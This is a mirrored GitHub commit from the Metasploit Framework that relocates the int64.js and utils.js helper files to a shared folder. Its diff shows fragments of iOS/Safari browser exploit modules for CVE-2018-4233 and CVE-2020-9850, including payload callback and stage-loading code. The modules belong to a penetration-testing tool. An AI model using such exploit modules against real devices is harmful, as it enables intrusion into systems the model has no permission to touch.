1
mirror of https://github.com/rapid7/metasploit-framework synced 2024-07-18 18:31:41 +02:00

move int64.js and utils.js to javascript_utils folder

This commit is contained in:
Tim W 2020-09-01 16:05:18 +08:00
parent 46db23c35e
commit 9150f0bc3a
5 changed files with 8 additions and 16 deletions

View File

@ -6,6 +6,7 @@
class MetasploitModule < Msf::Exploit::Remote
Rank = ManualRanking
include Msf::Post::File
include Msf::Exploit::EXE
include Msf::Exploit::Remote::HttpServer
@ -61,11 +62,6 @@ class MetasploitModule < Msf::Exploit::Remote
])
end
def exploit_data(directory, file)
path = ::File.join Msf::Config.data_directory, 'exploits', directory, file
::File.binread path
end
def payload_url
"tcp://#{datastore["LHOST"]}:#{datastore["LPORT"]}"
end
@ -304,8 +300,8 @@ function get_mem_rw(stage1) {
^
get_mem_rw = (version >= Gem::Version.new('11.2.2')) ? get_mem_rw_ios_11 : get_mem_rw_ios_10
utils = exploit_data "CVE-2018-4233", "utils.js"
int64 = exploit_data "CVE-2018-4233", "int64.js"
utils = exploit_data "javascript_utils", "utils.js"
int64 = exploit_data "javascript_utils", "int64.js"
dump_offsets = ''
if datastore['DUMP_OFFSETS']
dump_offsets = %Q^

View File

@ -484,8 +484,8 @@ class MetasploitModule < Msf::Exploit::Remote
return
end
utils = exploit_data 'CVE-2018-4233', 'utils.js'
int64 = exploit_data 'CVE-2018-4233', 'int64.js'
utils = exploit_data 'javascript_utils', 'utils.js'
int64 = exploit_data 'javascript_utils', 'int64.js'
stage0 = exploit_data 'CVE-2020-9850', 'stage0.bin'
stage1 = exploit_data 'CVE-2020-9850', 'loader.bin'
stage2 = exploit_data 'CVE-2020-9850', 'sbx.bin'

View File

@ -6,6 +6,7 @@
class MetasploitModule < Msf::Exploit::Remote
Rank = ManualRanking
include Msf::Post::File
include Msf::Exploit::EXE
include Msf::Exploit::Remote::HttpServer
@ -75,11 +76,6 @@ class MetasploitModule < Msf::Exploit::Remote
}
end
def exploit_data(directory, file)
path = ::File.join Msf::Config.data_directory, 'exploits', directory, file
::File.binread path
end
def stage1_js
stage1 = exploit_data "CVE-2018-4233", "stage1.bin"
"var stage1 = new Uint8Array([#{Rex::Text::to_num(stage1)}]);"
@ -140,8 +136,8 @@ EOF
return
end
utils = exploit_data "CVE-2018-4233", "utils.js"
int64 = exploit_data "CVE-2018-4233", "int64.js"
utils = exploit_data "javascript_utils", "utils.js"
int64 = exploit_data "javascript_utils", "int64.js"
html = %Q^
<html>
<body>